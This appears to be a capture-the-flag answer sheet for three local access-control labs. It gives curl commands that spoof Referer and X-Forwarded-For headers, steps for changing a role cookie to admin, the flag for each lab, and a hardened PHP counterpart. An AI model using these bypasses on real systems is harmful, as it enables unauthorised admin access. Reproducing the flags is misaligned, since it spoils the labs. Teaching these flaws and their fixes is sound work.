Lab 1 - Referer-based Access Control:
Add the HTTP header:
Referer: http://admin-portal.internal/
The server checks if Referer contains "admin-portal"; there is no real auth.
curl -H "Referer: http://admin-portal.internal/" http://localhost/AdminBypass/lab1.php
Flag: flag{admin_bypass_referer_spoof}

Lab 2 - Cookie Role Manipulation:
Look for the "role" cookie in DevTools → Application → Cookies.
Change the value from "guest" to "admin" and reload.
Flag: flag{admin_bypass_cookie_role_tamper}

Lab 3 - IP Whitelist Bypass:
The server trusts X-Forwarded-For without validation.
Add the header:
X-Forwarded-For: 127.0.0.1
curl -H "X-Forwarded-For: 127.0.0.1" http://localhost/AdminBypass/lab3.php
Flag: flag{admin_bypass_ip_whitelist_xff}
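
A hardened counterpart to the checks the three labs bypass, as an added example that is not the lab's own source code. The function names, the TRUSTED_PROXIES value, the allow-list and the sample requests are assumptions constructed for illustration.

```php
<?php
// Added example, not the lab's source. Names and addresses are hypothetical.
const TRUSTED_PROXIES = ['10.0.0.5']; // constructed: the one reverse proxy in front of the app

// Resolve the client address. X-Forwarded-For is honoured only when the TCP
// peer is a known proxy, and is read right to left so entries the client
// prepended are never reached.
function client_ip(array $server): string
{
    $peer = $server['REMOTE_ADDR'] ?? '';
    if (!in_array($peer, TRUSTED_PROXIES, true)) {
        return $peer; // direct connection: the header is client-controlled
    }
    $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? ''));
    foreach (array_reverse($hops) as $hop) {
        if (filter_var($hop, FILTER_VALIDATE_IP) === false) {
            return $peer; // malformed chain: fall back to the peer
        }
        if (!in_array($hop, TRUSTED_PROXIES, true)) {
            return $hop; // first address not written by our own proxy
        }
    }
    return $peer;
}

// Authorization reads server-side state only: the role stored in the session
// at login. Referer and a client-set "role" cookie are never consulted.
function is_admin(array $session, array $server, array $allowedIps): bool
{
    return ($session['role'] ?? 'guest') === 'admin'
        && in_array(client_ip($server), $allowedIps, true);
}

// Constructed requests mirroring the three labs.
$spoofed = [
    'REMOTE_ADDR'          => '203.0.113.9',
    'HTTP_REFERER'         => 'http://admin-portal.internal/',
    'HTTP_X_FORWARDED_FOR' => '127.0.0.1',
];
$proxied = ['REMOTE_ADDR' => '10.0.0.5', 'HTTP_X_FORWARDED_FOR' => '127.0.0.1, 198.51.100.7'];

var_dump(client_ip($spoofed));                                    // direct peer, spoofed header
var_dump(client_ip($proxied));                                    // request relayed by the trusted proxy
var_dump(is_admin([], $spoofed, ['127.0.0.1']));                  // no role in the session
var_dump(is_admin(['role' => 'admin'], $spoofed, ['127.0.0.1'])); // admin session, address not allowed
```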